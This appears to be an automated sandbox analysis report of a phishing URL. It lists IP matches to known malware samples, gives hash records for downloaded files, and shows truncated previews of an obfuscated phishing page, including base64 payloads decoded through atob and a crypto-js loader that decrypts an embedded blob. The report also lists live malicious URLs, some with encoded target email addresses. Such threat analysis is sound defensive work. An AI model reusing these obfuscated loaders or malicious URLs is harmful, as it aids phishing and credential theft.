                                    https://www.google.com/url?q=https%3A%2F%2Fyir.myvnc.com%2Fosh%2F&sa=D&sntz=1&usg=AOvVaw0upYvHpDviVW9Wdi9s8ilT#SILENTCODERSLIMAHURUFE-SUREOSHAYmdvZWRlY2tlQHN3ZWVwaW5nY29ycC5jb20=Get hashmaliciousUnknownBrowse
                                    • 104.16.2.189
                                    Details2200902015.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 104.21.64.1
                                    http://content.vibly.itGet hashmaliciousUnknownBrowse
                                    • 104.16.79.73
                                    one.elfGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1
                                    PO#6536983.cmdGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                    • 104.21.112.1
                                    https://www.envoice.in/invoice/attachment?token=KVuGLoehNae1TTmcoP5fURVZa2Clb4uoU54ZN62dm5bt4GI5SbJSW4i0gvqX8OqC8du8FWxO1FyKUMdXWD85tucV981ZqOB32A7Io9cUN81nVPlXDT5TwIo4bnOJevlP&obfuscatedFileName=1739953701-K0XOHIfac9FrSomhOQ0bGet hashmaliciousHTMLPhisherBrowse
                                    • 104.21.80.1
                                    b4.elfGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1
                                    NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdINMessage 3.emlGet hashmaliciousUnknownBrowse
                                    • 103.83.194.5
                                    evidence.pdfGet hashmaliciousUnknownBrowse
                                    • 103.83.194.5
                                    Play_VM-Now(beverly.wilson)VWAV.html.._Get hashmaliciousUnknownBrowse
                                    • 103.83.194.5
                                    Action Required Review__Sign 2025 Q1 ELECTRONIC FUNDING REF_ID 8258068911.msgGet hashmaliciousUnknownBrowse
                                    • 103.83.194.5
                                    Payment7667_ATTN.htmlGet hashmaliciousUnknownBrowse
                                    • 103.83.194.5
                                    anon 200679.htmlGet hashmaliciousUnknownBrowse
                                    • 103.83.194.5
                                    https://rs6.net/tn.jsp?f=001OaeaJROLPlYeRGCnbZAYWPf4SGdmoTtqWZEHmebziyNVRAy4x8-AJ_GbdUrg7rjgF4JhDw0oI7PpLyvr6earWBnhba4M_cHOdVj5dPgnOVwkBMFfc9uBFZ8YQpubq9fYFQScdQM1aAcwC_T1AVVo6A==&c=&ch=&__=/asdf/bGluZGEuaGFja2xlckBzbGVlcGVyc2V3ZWxsLmNvbQ==Get hashmaliciousUnknownBrowse
                                    • 103.83.194.5
                                    https://rs6.net/tn.jsp?f=001_rnLab8dvmoe34LZhirF-nFYodS4Z30LlV-jZpBF6Ho_b-ejS9GpW0fVXQA2_Y9ukEPQiegaR-4_xvdWVJcLmYrH2b_FrbHtdS9Td2_c3Y6PfD20xR6UoDYnpv3FNLpP_fnuFc_dNZk381XYX2zrNw==&c=&ch=&__=/asdf/YW5uYS5yaWNrc0Bkb25uZWxsY29tcGFueS5jb20=/YnJ5YW4ucGFybmVsbEBteW1hbmF0ZWUub3JnGet hashmaliciousUnknownBrowse
                                    • 103.83.194.55
                                    7130192d-35f9-901b-2e4b-24c27e79bf36.emlGet hashmaliciousUnknownBrowse
                                    • 103.83.194.5
                                    REMITTANCE ADVICE 3678866210.htmlGet hashmaliciousUnknownBrowse
                                    • 103.83.194.5
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    1138de370e523e824bbca92d049a3777https://certificate.hypnotherapy-training.co.nzGet hashmaliciousUnknownBrowse
                                    • 173.222.162.64
                                    https://www.irmaflores.net/suh/*Get hashmaliciousUnknownBrowse
                                    • 173.222.162.64
                                    https://atstrack.com/customer-support/software.htmlGet hashmaliciousUnknownBrowse
                                    • 173.222.162.64
                                    https://deepseekcaptcha.top/verif.htmlGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                    • 173.222.162.64
                                    http://elcharrousa.comGet hashmaliciousUnknownBrowse
                                    • 173.222.162.64
                                    https://gaamnexloginn.webflow.io/Get hashmaliciousUnknownBrowse
                                    • 173.222.162.64
                                    https://5510007.top/Get hashmaliciousUnknownBrowse
                                    • 173.222.162.64
                                    http://honeyyy853.github.io/netflixClone/Get hashmaliciousHTMLPhisherBrowse
                                    • 173.222.162.64
                                    https://privacytrackersocialinfluence.vercel.app/3ae&25&93cf6=5a&1eGK9d0xe13da4b=D400e.htmlGet hashmaliciousUnknownBrowse
                                    • 173.222.162.64
                                    http://liefrung.neu.planen.3-64-214-85.cprapid.com/app/Get hashmaliciousUnknownBrowse
                                    • 173.222.162.64
                                    3b5074b1b5d032e5620f69f9f700ff0eBibliofils.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                    • 40.115.3.253
                                    • 40.113.103.199
                                    Researches.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                    • 40.115.3.253
                                    • 40.113.103.199
                                    https://aincaseguridad.com.co/Invoice39826.htmlGet hashmaliciousScreenConnect Tool, PhisherBrowse
                                    • 40.115.3.253
                                    • 40.113.103.199
                                    gq8sce-clean.com.com.exeGet hashmaliciousAgentTesla, Discord Token StealerBrowse
                                    • 40.115.3.253
                                    • 40.113.103.199
                                    Ebizcharge-BonusSupport-request-approved.pdfGet hashmaliciousUnknownBrowse
                                    • 40.115.3.253
                                    • 40.113.103.199
                                    Marlen LOI.vbeGet hashmaliciousAgentTeslaBrowse
                                    • 40.115.3.253
                                    • 40.113.103.199
                                    HDFC PAYMENT.batGet hashmaliciousUnknownBrowse
                                    • 40.115.3.253
                                    • 40.113.103.199
                                    Customer Request.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 40.115.3.253
                                    • 40.113.103.199
                                    1616.txt.ps1Get hashmaliciousUnknownBrowse
                                    • 40.115.3.253
                                    • 40.113.103.199
                                    DHL RPA GRBP Template.PDF.jsGet hashmaliciousRemcosBrowse
                                    • 40.115.3.253
                                    • 40.113.103.199
                                    No context
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):937
                                    Entropy (8bit):7.737931820487441
                                    Encrypted:false
                                    SSDEEP:24:2PUSIn/IylOgX9qCigRmHQxlCNebarFY9:2PLCHlOgXQ9Oie+rw
                                    MD5:FC3B7BBE7970F47579127561139060E2
                                    SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                    SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                    SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (48263)
                                    Category:dropped
                                    Size (bytes):48264
                                    Entropy (8bit):5.400221703851042
                                    Encrypted:false
                                    SSDEEP:768:GHC+qxLCNuPhydZaR35KOJby4bmofHJ4zY5Z7Vt7jzEgVYMUsMePykWt/HKaN+Pf:GG2NuPhydZaR3gYe4bxeM5ZAsMe+thW7
                                    MD5:8BDE1466278EDBC80095065C0A8606B6
                                    SHA1:F99781A5A0FA1AE58218329F47C5163363B403D0
                                    SHA-256:5BBA95CD14598342C37B07F71259E8813BA6C1E856D0BED270105F50D88309D0
                                    SHA-512:97930A5AB263CE446278B035777E7D70A7DB85CD7CC3B2C6817C20BBEE2DAC9B6440223F17443994A80B6169624C1E6986832A39A1F05703ADAE4CA95F388345
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:"use strict";(function(){function Ht(e,t,n,o,c,l,g){try{var y=e[l](g),s=y.value}catch(p){n(p);return}y.done?t(s):Promise.resolve(s).then(o,c)}function jt(e){return function(){var t=this,n=arguments;return new Promise(function(o,c){var l=e.apply(t,n);function g(s){Ht(l,o,c,g,y,"next",s)}function y(s){Ht(l,o,c,g,y,"throw",s)}g(void 0)})}}function D(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):D(e,t)}function Ue(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e}function De(e){for(var t=1;t<arguments.length;t++){var n=arguments[t]!=null?arguments[t]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Ue(e,c,n[c])})}return e}function Sr(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (48263)
                                    Category:downloaded
                                    Size (bytes):48264
                                    Entropy (8bit):5.400221703851042
                                    Encrypted:false
                                    SSDEEP:768:GHC+qxLCNuPhydZaR35KOJby4bmofHJ4zY5Z7Vt7jzEgVYMUsMePykWt/HKaN+Pf:GG2NuPhydZaR3gYe4bxeM5ZAsMe+thW7
                                    MD5:8BDE1466278EDBC80095065C0A8606B6
                                    SHA1:F99781A5A0FA1AE58218329F47C5163363B403D0
                                    SHA-256:5BBA95CD14598342C37B07F71259E8813BA6C1E856D0BED270105F50D88309D0
                                    SHA-512:97930A5AB263CE446278B035777E7D70A7DB85CD7CC3B2C6817C20BBEE2DAC9B6440223F17443994A80B6169624C1E6986832A39A1F05703ADAE4CA95F388345
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    URL:https://challenges.cloudflare.com/turnstile/v0/g/0e3e6804b971/api.js
                                    Preview:"use strict";(function(){function Ht(e,t,n,o,c,l,g){try{var y=e[l](g),s=y.value}catch(p){n(p);return}y.done?t(s):Promise.resolve(s).then(o,c)}function jt(e){return function(){var t=this,n=arguments;return new Promise(function(o,c){var l=e.apply(t,n);function g(s){Ht(l,o,c,g,y,"next",s)}function y(s){Ht(l,o,c,g,y,"throw",s)}g(void 0)})}}function D(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):D(e,t)}function Ue(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e}function De(e){for(var t=1;t<arguments.length;t++){var n=arguments[t]!=null?arguments[t]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Ue(e,c,n[c])})}return e}function Sr(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                    Category:downloaded
                                    Size (bytes):937
                                    Entropy (8bit):7.737931820487441
                                    Encrypted:false
                                    SSDEEP:24:2PUSIn/IylOgX9qCigRmHQxlCNebarFY9:2PLCHlOgXQ9Oie+rw
                                    MD5:FC3B7BBE7970F47579127561139060E2
                                    SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                    SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                    SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    URL:https://developers.cloudflare.com/favicon.png
                                    Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (65447)
                                    Category:downloaded
                                    Size (bytes):89501
                                    Entropy (8bit):5.289893677458563
                                    Encrypted:false
                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                    Malicious:false
                                    URL:https://code.jquery.com/jquery-3.6.0.min.js
                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:HTML document, ASCII text, with very long lines (65097)
                                    Category:downloaded
                                    Size (bytes):487362
                                    Entropy (8bit):4.108086858314147
                                    Encrypted:false
                                    SSDEEP:1536:vkfWMazGPPCLjJDA9AMsQrXfWMazGPPCLjJDA9AMsQrULB/qLB/+:lM0C6MsQIM0C6MsQA6W
                                    MD5:43729919122934FC02FE958A3281F764
                                    SHA1:49E47240D7B829B4ED693652CB277A6B53C87178
                                    SHA-256:2405BB85630EEEA19C547AC00F9CD0F8799AD8620EEF0E69831E6A2D120C2708
                                    SHA-512:51CA6C2EB85E39863B8C5C7E68380A462AD5E0A986F8880E543DA942F9859B6771101836382D9F59D34DA84C996E579E81A587FFF6EC12F882F2712C77828258
                                    Malicious:false
                                    URL:https://i2.ictacquist.ru/vm9xG/
                                    Preview: Success is not the absence of failure; it&#039;s the persistence through failure. -->. Success is not the key to happiness. Happiness is the key to success. If you love what you are doing, you will be successful. -->.<script>./* Success is the sum of small efforts, repeated day in and day out. */.FGBVjwUhMy = atob("aHR0cHM6Ly94RFIuaWN0YWNxdWlzdC5ydS92bTl4Ry8=");.etxHwhDnPf = atob("bm9tYXRjaA==");.if(FGBVjwUhMy == etxHwhDnPf){.document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxsaW5rIHJlbD0iaWNvbiIgaHJlZj0iaHR0cHM6Ly9kZXZlbG9wZXJzLmNsb3VkZmxhcmUuY29tL2Zhdmljb24ucG5nIiB0eXBlPSJpbWFnZS94LWljb24iPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPgogICAgPHNjcmlwdD4KICAgIG5ldyBQcm94eSh7fSwgeyAKICBnZX
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (48316), with no line terminators
                                    Category:downloaded
                                    Size (bytes):48316
                                    Entropy (8bit):5.6346993394709
                                    Encrypted:false
                                    SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                    MD5:2CA03AD87885AB983541092B87ADB299
                                    SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                    SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                    SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                    Malicious:false
                                    URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (1313), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1952
                                    Entropy (8bit):5.954491945582727
                                    Encrypted:false
                                    SSDEEP:48:2j7b+17YAXLkvSowpIom5CboGbOuIsOi74:2j+7LXgvDwO+1KuIu74
                                    MD5:AB0EF74E7FF880C224DBE28586A31F47
                                    SHA1:2BF0580944C384567BC4AF36A708CA09A3675023
                                    SHA-256:F916A45502613D7BF93215443C9FFAC5C0FB7EB0B67831638411A5A341F12A70
                                    SHA-512:0F09DBE08AB230919B885761DDCEBE594A0BC93A16E6002079FD11A86210B37E13B75E9DC7F7752D2E7BD60BAB116C49051BD46A88FB59CB3924A824B68F24E6
                                    Malicious:false
                                    Preview: var iQWbSvWtJUDIYnUz = document.createElement("script");..iQWbSvWtJUDIYnUz.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(iQWbSvWtJUDIYnUz);..iQWbSvWtJUDIYnUz.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoielNYZW9wTUdhVGRBU2I3ejZGZVRpTlV6M1YzMTNmYnRVYTlXbWdScmJpZVlRSmN5XC9ONlMyaHNIdVhQbnhPcE5ZRUVcL0M1bnFkNUhLVmM5dVBjdmFSbHlTMUhTWnJWKzJnWjh1aGdIMzh2NVVlUkVnY2tYSGlwbVhXTmJnN0lmb2RSZ3YrVmtBVGNhdUFHZUowcVBVTmxDSlNZb1Z3STJ4VTBpUUU0T3JNcUQ3eDhCVEF2SXBRdnJkWkVxZkxUdEpuSGdTOUZyeTI2dnk0QmVINHhsdVErRTFtdEdTT3pCOTZMaGgwdFl3OExvek8xeU1yam55MHNQVDhtNThOZVdIZHBKdGpJNkpnSENqazhFaERiYU5sQkpcL0ROM0FpcEpMU2F6V2ZhZjJ6blliSitKRG9HMDVFWEZkelhTNlNad2oxdnIxNmIyYmRpd3JQUUtIakNZdUhFQkZXdUxQZ25HUjhXNUdoVUxQdkR2RHcrbUhtTEoyWVRrcys1TnhDWE9GcTJ1NUZXVVZnUXorZ1VPQk1KNUw3cm1ISTJRd2hYZTVCWmxTN09SSDQ4TWJ5RHFRXC9xZG1CNkZPbitVaHlmcmdFb2Jjc0NhZm44TnpNRiswVkRRSTFhQnZ5MXprUHQzOVNLb3pscHk3RHpGOHEwNmNjOFhjMTJSazZBVlNQWTh3TGFhVGpkXC9CejAwMW
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (48316), with no line terminators
                                    Category:dropped
                                    Size (bytes):48316
                                    Entropy (8bit):5.6346993394709
                                    Encrypted:false
                                    SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                    MD5:2CA03AD87885AB983541092B87ADB299
                                    SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                    SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                    SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                    Malicious:false
                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:Web Open Font Format (Version 2), TrueType, length 21444, version 1.0
                                    Category:downloaded
                                    Size (bytes):21444
                                    Entropy (8bit):7.990871977021031
                                    Encrypted:true
                                    SSDEEP:384:8cEHB0MPPblbQ3jOYVdSj2WvnrFnimhmA4sC1ad7RNwAwEMwdz12N/:LEv5QKYanrFtm8d7Rbwyo/
                                    MD5:FFD3D57638A7899D80BCC108713C271C
                                    SHA1:D186409EE24FC3D1CC8194434DD707181EAD20EC
                                    SHA-256:99027D866818F716D208569108A962AC72200197CAE503EFE5B6BF002BF4915B
                                    SHA-512:7305C344CD8F954929314F3B5C9B996638E57D5F142A327DDC9F42F592880EA30B5102C73EE0E296BB3C4FC21D9FCE5D862A492B4BC1127BA2C79C4DEF527C62
                                    Malicious:false
                                    URL:https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlWHYg.woff2
                                    Preview:wOF2......S........P..ST..........................q..f..b?HVAR...`?STATX'..../D....(.N..d.0...6.$..D. ...........%..............B....6.@3....IND&..H...=.10.]....>.A,a.a8,\.K.0..+.....V..n...\.E...C._(T8..-1..n]....g;1.D.r.0.$3.adra)..<.r.#..YX.;....C(.....#a1.g.8Q......v.|.d'O......tF..@;.KKig1...?.rSM#...)..!@.-"`dcd#R..1.!T;...u.|.....K...NY.........q..YW...Q..`<..h...........^...'...4..~(..J\.z.....}?.f.C.....~ hB.TB.}.{.Vm..8....m/C..L.......`PH..M1....5m........R.nH.$GYX `.&...9.WY...%&~..]..$X!..-..E&U.B.....Z'n......K...,.......h/.].4m^o8.P.....-.k.....l.z. .(.%K.P....0.].Y].9M@Y.na.Yt...wJ.+.oy$J.......=%'|..$IT.%H.Bt......|H#...j..G...@p...B..../u...d............Y.......C..G..M.....6....X..VT..'W.2.6[.R...Z{._L1;.!~.......xZ\.*.-.L._....JG;W.*.L........8-.i.....|.%E..PX...*...CH....A.%y....9..E..ukWv.+]........t.3..d|..m>...L..e7.fUU.+kd.....W;.o`.x..!.1{*Ld...U.../D..T..u.B6Y..H..r.U...3s.....&.F.my@......T.~...y...4D<..5.o.f/..
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (65447)
                                    Category:dropped
                                    Size (bytes):89501
                                    Entropy (8bit):5.289893677458563
                                    Encrypted:false
                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                    Malicious:false
                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (1317), with CRLF line terminators
                                    Category:downloaded
                                    Size (bytes):1956
                                    Entropy (8bit):5.985954845721122
                                    Encrypted:false
                                    SSDEEP:48:U7bjybKgqOAZL66O2DP92BiBqizoJCqYXisuIaT7a:ULyaRM6Ok/BqizoJozuIE7a
                                    MD5:6DDE74A3FA8FDB6E6B74706DE90E5F9F
                                    SHA1:31F3AEDD920D044C70BB86A5EA7F29E59D19A5C2
                                    SHA-256:27FE8124C9E49FC2E31B0B6FAE5634869E559C00B076AFB9BB74C601E77DBC26
                                    SHA-512:FE47EF4EFEBCC8E70F0A55368AE4DA98A1FE7BF3D05AE87D255ED6BC1E7E28A8B0E8E52FDB47B7AEFA5E7E7C2D040CE535443F4324D20DCD579FFBCB27E98333
                                    Malicious:false
                                    URL:https://fascia.fit/.res444.php?2-68747470733a2f2f69322e696374616371756973742e72752f766d3978472f-NfnOSY
